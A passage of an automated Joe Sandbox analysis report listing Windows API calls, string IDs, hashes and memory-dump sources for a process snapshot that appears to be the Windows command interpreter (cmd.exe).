                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BD4DEE
                                                                                                                    • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4E04
                                                                                                                      • Part of subcall function 00007FF789BD0580: _get_osfhandle.MSVCRT ref: 00007FF789BD0589
                                                                                                                      • Part of subcall function 00007FF789BD0580: SetConsoleMode.KERNELBASE ref: 00007FF789BD059E
                                                                                                                      • Part of subcall function 00007FF789BD0580: _get_osfhandle.MSVCRT ref: 00007FF789BD05AF
                                                                                                                      • Part of subcall function 00007FF789BD0580: GetConsoleMode.KERNELBASE ref: 00007FF789BD05C5
                                                                                                                      • Part of subcall function 00007FF789BD0580: _get_osfhandle.MSVCRT ref: 00007FF789BD05EF
                                                                                                                      • Part of subcall function 00007FF789BD0580: GetConsoleMode.KERNELBASE ref: 00007FF789BD0605
                                                                                                                      • Part of subcall function 00007FF789BD0580: _get_osfhandle.MSVCRT ref: 00007FF789BD0632
                                                                                                                      • Part of subcall function 00007FF789BD0580: SetConsoleMode.KERNELBASE ref: 00007FF789BD0647
                                                                                                                      • Part of subcall function 00007FF789BD4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A28
                                                                                                                      • Part of subcall function 00007FF789BD4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A66
                                                                                                                      • Part of subcall function 00007FF789BD4A14: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A7D
                                                                                                                      • Part of subcall function 00007FF789BD4A14: memmove.MSVCRT(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A9A
                                                                                                                      • Part of subcall function 00007FF789BD4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4AA2
                                                                                                                      • Part of subcall function 00007FF789BD4AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC8798), ref: 00007FF789BD4AD6
                                                                                                                      • Part of subcall function 00007FF789BD4AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC8798), ref: 00007FF789BD4AEF
                                                                                                                      • Part of subcall function 00007FF789BD5554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF789BD4E35), ref: 00007FF789BD55DA
                                                                                                                      • Part of subcall function 00007FF789BD5554: RegQueryValueExW.KERNELBASE ref: 00007FF789BD5623
                                                                                                                      • Part of subcall function 00007FF789BD5554: RegQueryValueExW.KERNELBASE ref: 00007FF789BD5667
                                                                                                                      • Part of subcall function 00007FF789BD5554: RegQueryValueExW.KERNELBASE ref: 00007FF789BD56BE
                                                                                                                      • Part of subcall function 00007FF789BD5554: RegQueryValueExW.KERNELBASE ref: 00007FF789BD5702
                                                                                                                    • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4E35
                                                                                                                    • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4E81
                                                                                                                    • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4F69
                                                                                                                    • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4F95
                                                                                                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4FB0
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4FC1
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4FD8
                                                                                                                    • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4FF8
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD5037
                                                                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD504B
                                                                                                                    • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD50DF
                                                                                                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD50F2
                                                                                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD510F
                                                                                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD5130
                                                                                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD514A
                                                                                                                    • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD5175
                                                                                                                      • Part of subcall function 00007FF789BD3578: _get_osfhandle.MSVCRT ref: 00007FF789BD3584
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD359C
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35C3
                                                                                                                      • Part of subcall function 00007FF789BD3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35D9
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35ED
                                                                                                                      • Part of subcall function 00007FF789BD3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD3602
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                     • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressHandleProcProcess$AllocCommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireAllocateBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                                                    • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                                    • API String ID: 3614140610-3021193919
                                                                                                                    • Opcode ID: 26c4a5be1374ecc4c1545982d09c2704671cd2583fe219aad5da637b47a9b9f8
                                                                                                                    • Instruction ID: 22efc88dd552683d3af2fb7c024f1b8c5bdbf79637bb056f4780cf7cfe8c1f69
                                                                                                                    • Opcode Fuzzy Hash: 26c4a5be1374ecc4c1545982d09c2704671cd2583fe219aad5da637b47a9b9f8
                                                                                                                    • Instruction Fuzzy Hash: 99C16F61A09A4A96EA44BF21E814178EFB1FF89F92FE48134D90E03795EF3DA445C360
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                     • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                                    • String ID: :
                                                                                                                    • API String ID: 1809961153-336475711
                                                                                                                    • Opcode ID: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
                                                                                                                    • Instruction ID: b0d96a2fd9b7916e2b00d8c2bbcad7862bcae1d816a6a14b0cde534e318dba2c
                                                                                                                    • Opcode Fuzzy Hash: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
                                                                                                                    • Instruction Fuzzy Hash: 1DD16F3260CB8992EA60EF15E4582B9FBB1FB84B96F944135DA4E437A5EF3CE444C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                     • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                                                    • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                    • API String ID: 2622545777-4197029667
                                                                                                                    • Opcode ID: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
                                                                                                                    • Instruction ID: 60fd9973c3da53a564de136386a01161a2632694cfad739d6541687127a0554c
                                                                                                                    • Opcode Fuzzy Hash: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
                                                                                                                    • Instruction Fuzzy Hash: ED919021B09B8A85EE24AF50D8582B8ABB1FF49F96FE44135C90E47695EF3CE505C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                     • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleMode_get_osfhandle
                                                                                                                    • String ID: CMD.EXE
                                                                                                                    • API String ID: 1606018815-3025314500
                                                                                                                    • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                    • Instruction ID: 3299cb7f43317e234de5a003531adecd52e5948384da8e56c3566d34a81e151e
                                                                                                                    • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                    • Instruction Fuzzy Hash: 7741A835A09746DBE644AF25E855578FEB0BB89F56FE58139C90E433A0EF3DA404C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    Control-flow graph (edge list of the rendered graph omitted): entry 7ff789bcc620, basic blocks 992-1114; API calls in the graph: GetConsoleTitleW, GetLastError, towupper, SetConsoleTitleW, wcsncmp, wcschr
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleTitlewcschr
                                                                                                                    • String ID: /$:
                                                                                                                    • API String ID: 2364928044-4222935259
                                                                                                                    • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                                                                    • Instruction ID: b8abf05d1ee36f7657701d36279c7cd405663751491767debf31f8a4a979afa1
                                                                                                                    • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                                                                    • Instruction Fuzzy Hash: 21C1C361A0864A81EB54BF25D818279EAB0FF91FAAFE45531D91E472D5EF3CEC41C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    Control-flow graph (edge list of the rendered graph omitted): entry 7ff789bd8d80, basic blocks 1171-1206; API calls in the graph: Sleep, _amsg_exit, _initterm, exit, _cexit
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4291973834-0
                                                                                                                    • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                    • Instruction ID: fd36f15fa70688c71d3d237c448c6d7c2621358d1865a51b08f47448841d4206
                                                                                                                    • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                    • Instruction Fuzzy Hash: E641EA31A0864B82FB50BF14E848279BAB0FF84B87FA40435D90D47AA1EF7CE940C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    Control-flow graph (edge list of the rendered graph omitted): entry 7ff789bd4a14, basic blocks 1207-1214; API calls in the graph: GetEnvironmentStringsW, GetProcessHeap, RtlAllocateHeap, memmove, FreeEnvironmentStringsW
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A28
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A66
                                                                                                                    • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A7D
                                                                                                                    • memmove.MSVCRT(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A9A
                                                                                                                    • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4AA2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentHeapStrings$AllocateFreeProcessmemmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 647542462-0
                                                                                                                    • Opcode ID: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                                                                                                    • Instruction ID: 22b6ab8d10396b70089c8aa42b937a7d59a23d72c71fb2171ac516d91849c66a
                                                                                                                    • Opcode Fuzzy Hash: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                                                                                                    • Instruction Fuzzy Hash: 42119122A1474A82EA50AF01A408039FFB1FB89FD1BA99038DE4E03784EE3DE441C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1826527819-0
                                                                                                                    • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                    • Instruction ID: 562cfe40114dfa559621950d2e94bbb69561535941de4195e46df5234c609949
                                                                                                                    • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                    • Instruction Fuzzy Hash: F5011E2190968ACAE7047F55A858179FE70FB8AF97FE45134E54F06396EF3C9044C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$FullNamePathwcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1464828906-0
                                                                                                                    • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                    • Instruction ID: 27f947337f6c6770e3a38acb9bed05b055e5ccdb58b107c6198c233ad4e4fe5f
                                                                                                                    • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                    • Instruction Fuzzy Hash: EB31F521A0865A82E724BF15A44817EFA71FB45FDAFE48234DA4E433D1EE7DE885C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC8798), ref: 00007FF789BD4AD6
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC8798), ref: 00007FF789BD4AEF
                                                                                                                      • Part of subcall function 00007FF789BD4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A28
                                                                                                                      • Part of subcall function 00007FF789BD4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A66
                                                                                                                      • Part of subcall function 00007FF789BD4A14: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A7D
                                                                                                                      • Part of subcall function 00007FF789BD4A14: memmove.MSVCRT(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A9A
                                                                                                                      • Part of subcall function 00007FF789BD4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4AA2
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC8798), ref: 00007FF789BDEE64
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF789BC8798), ref: 00007FF789BDEE78
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Process$EnvironmentFreeStrings$AllocAllocatememmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3874763886-0
                                                                                                                    • Opcode ID: 573339bfc65e46a6dc0536e612d39ff43a234acebcc174d4b54bf8b687b66270
                                                                                                                    • Instruction ID: 93bd9967961ae498392f02c231caa2ae154bb390240f73a08be53760b780a47c
                                                                                                                    • Opcode Fuzzy Hash: 573339bfc65e46a6dc0536e612d39ff43a234acebcc174d4b54bf8b687b66270
                                                                                                                    • Instruction Fuzzy Hash: D6F0FF61B15B4A87EF54AF659408178EDE1FF8EF92BA89434CD0E46390FE3CA444C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
